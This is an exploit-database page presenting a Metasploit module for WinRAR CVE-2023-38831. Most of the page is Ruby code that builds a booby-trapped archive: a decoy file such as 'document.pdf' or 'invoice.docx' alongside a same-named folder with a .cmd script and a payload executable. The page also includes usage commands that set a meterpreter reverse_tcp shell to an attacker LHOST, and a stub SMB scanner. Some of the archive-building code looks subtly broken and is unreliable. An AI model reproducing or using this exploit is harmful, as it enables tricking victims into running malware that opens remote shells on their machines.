Vulners
Lucene search
📄 WinRAR 6.22 Malicious ZIP Creation
10
=============================================================================================================================================
| # Title : WinRAR 6.22 and earlier - Logical Flaw in File ExtractionExploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.win-rar.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/177803/ & CVE-2023-38831
[+] Summary :
This module exploits a logical flaw in WinRAR versions before 6.23. The vulnerability
allows attackers to create specially crafted ZIP archives that, when opened, execute
arbitrary code by exploiting the file extraction logic when a user double-clicks on
a file within the archive that has an embedded folder with the same name.
[+] POC :
---
##
# Vulnerability: WinRAR 6.22 and earlier - Logical Flaw in File Extraction
# Author: indoushka
# CVE-2023-38831
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'WinRAR CVE-2023-38831 Logical Flaw Exploit',
'Description' => %q{
This module exploits a logical flaw in WinRAR versions before 6.23. The vulnerability
allows attackers to create specially crafted ZIP archives that, when opened, execute
arbitrary code by exploiting the file extraction logic when a user double-clicks on
a file within the archive that has an embedded folder with the same name.
},
'Author' => [
'indoushka', # Metasploit module
'E1.Coders' # Original research
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-38831'],
['URL', 'https://www.rarlab.com/rarnew.htm'],
['URL', 'https://news.ycombinator.com/item?id=37135383']
],
'DefaultOptions' => {
'EXITFUNC' => 'process',
'DisablePayloadHandler' => false
},
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Payload' => {
'Space' => 4096,
'BadChars' => "\x00",
'DisableNops' => true
},
'Targets' => [
[
'Windows Universal (RAR <= 6.22)',
{
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}
]
],
'Privileged' => false,
'DisclosureDate' => '2023-08-23',
'DefaultTarget' => 0))
register_options([
OptString.new('FILENAME', [true, 'The output file name', 'exploit.rar']),
OptString.new('DECOY_NAME', [true, 'Decoy file name', 'document.pdf']),
OptBool.new('HIDEEXE', [true, 'Hide executable extension', true])
])
end
def exploit
# Generate payload executable
pe_payload = generate_payload_exe
# Create temporary directory for exploit construction
temp_dir = Rex::Text.rand_text_alpha(8)
Dir.mkdir(temp_dir) rescue nil
# Create decoy folder structure
decoy_name = datastore['DECOY_NAME']
folder_name = "#{decoy_name}\\"
script_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.cmd"
exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe"
# Build the malicious archive
rar_content = build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload)
# Create the final RAR file
file_create(rar_content)
print_status("Exploit archive created: #{datastore['FILENAME']}")
print_status("When victim opens the archive and double-clicks '#{decoy_name}', payload will execute")
end
def build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload)
rar = ""
# RAR file signature
rar << "\x52\x61\x72\x21\x1A\x07\x00"
# Build file entries using RAR format
# First: The decoy file
rar << build_file_header(decoy_name, pe_payload.length)
rar << pe_payload
# Second: The folder (trailing backslash)
rar << build_file_header(folder_name, 0)
# Third: The script file inside the folder
script_content = build_script_content
rar << build_file_header(script_name, script_content.length)
rar << script_content
# Fourth: The executable inside the folder
rar << build_file_header(exe_name, pe_payload.length)
rar << pe_payload
# End of archive
rar << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
rar
end
def build_file_header(filename, file_size)
header = ""
# Header type (file header)
header << "\x74"
# Header size
header << "\x3A\x00"
# Flags (important for the exploit)
flags = 0x8000 # Long filename
flags |= 0x0100 # File has extended time field
header << [flags].pack('v')
# Compressed size
header << [file_size].pack('V')
# Uncompressed size
header << [file_size].pack('V')
# OS (Windows)
header << "\x02"
# File CRC (fake)
header << "\x00\x00\x00\x00"
# File time (current time)
time = Time.now
dos_time = ((time.year - 1980) << 25) | (time.month << 21) | (time.day << 16) |
(time.hour << 11) | (time.min << 5) | (time.sec / 2)
header << [dos_time].pack('V')
# RAR version (5.0)
header << "\x32\x00"
# Method (store)
header << "\x30"
# Name size
header << [filename.length].pack('v')
# Attributes
header << "\x20\x00\x00\x00" # Archive attribute
# File name
header << filename
# Extra data for long filename
if filename.length > 0
extra_size = 2 + filename.length + 1
header << "\x01\x00" # Extra type (long filename)
header << [extra_size].pack('v')
header << filename
header << "\x00"
end
header
end
def build_script_content
# Create a script that executes the payload
script = "@echo off\r\n"
script << "start \"\" \"%~dp0#{Rex::Text.rand_text_alpha(8)}.exe\"\r\n"
script << "exit\r\n"
script
end
# Alternative method using RubyZip for more reliable ZIP creation
def create_zip_exploit
require 'zip'
zip_data = ""
Zip::OutputStream.write_buffer do |zos|
# Add decoy file
zos.put_next_entry(datastore['DECOY_NAME'])
zos.write(generate_payload_exe)
# Add folder with trailing slash
folder_name = "#{datastore['DECOY_NAME']}/"
zos.put_next_entry(folder_name)
# Add script inside folder
script_name = "#{folder_name}script.cmd"
zos.put_next_entry(script_name)
zos.write(build_script_content)
# Add executable inside folder
exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe"
zos.put_next_entry(exe_name)
zos.write(generate_payload_exe)
end.string
end
# Advanced: Create a more sophisticated exploit with multiple decoys
def create_advanced_exploit
print_status("Creating advanced WinRAR exploit...")
# Use multiple file formats as decoys
decoys = [
"document.pdf",
"invoice.docx",
"photo.jpg",
"spreadsheet.xlsx"
]
zip_data = ""
Zip::OutputStream.write_buffer do |zos|
decoys.each do |decoy|
# Add decoy file
zos.put_next_entry(decoy)
zos.write(generate_payload_exe)
# Add folder for this decoy
folder_name = "#{decoy}/"
zos.put_next_entry(folder_name)
# Add payload in folder
exe_name = "#{folder_name}payload.exe"
zos.put_next_entry(exe_name)
zos.write(generate_payload_exe)
# Add script to trigger execution
script_name = "#{folder_name}run.cmd"
zos.put_next_entry(script_name)
zos.write("@start payload.exe\r\n")
end
end.string
end
end
######### Auxiliary module for WinRAR vulnerability detection ############
class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'WinRAR CVE-2023-38831 Vulnerability Scanner',
'Description' => %q{
This module scans for systems vulnerable to the WinRAR CVE-2023-38831 vulnerability
by checking WinRAR versions and testing exploitability.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-38831']
]
)
register_options([
OptString.new('RHOSTS', [true, 'Target address range or CIDR identifier']),
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
OptString.new('SMBUSER', [false, 'The username to authenticate as']),
OptString.new('SMBPASS', [false, 'The password for the specified username']),
OptString.new('SMBDOMAIN', [false, 'The Windows domain to use for authentication'])
])
end
def run
# Scan for WinRAR installations and check versions
print_status("Scanning for vulnerable WinRAR installations...")
# Implementation would connect to targets and check WinRAR versions
# This is a simplified version - actual implementation would require
# SMB connection and registry checks
vulnerable_versions = [
'6.22', '6.21', '6.20', '6.11', '6.10', '6.02', '6.01', '6.00',
'5.91', '5.90', '5.80', '5.70', '5.60', '5.50', '5.40', '5.30'
]
# For each target, check WinRAR version
# If version <= 6.22, mark as vulnerable
end
end
################ Usage Examples:
# Generate exploit with default settings
use exploit/windows/fileformat/winrar_cve_2023_38831
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit
# Generate with custom decoy name
set DECOY_NAME invoice.pdf
exploit
# Generate without hiding executable
set HIDEEXE false
exploit
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Nov 2025 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.8
EPSS0.97798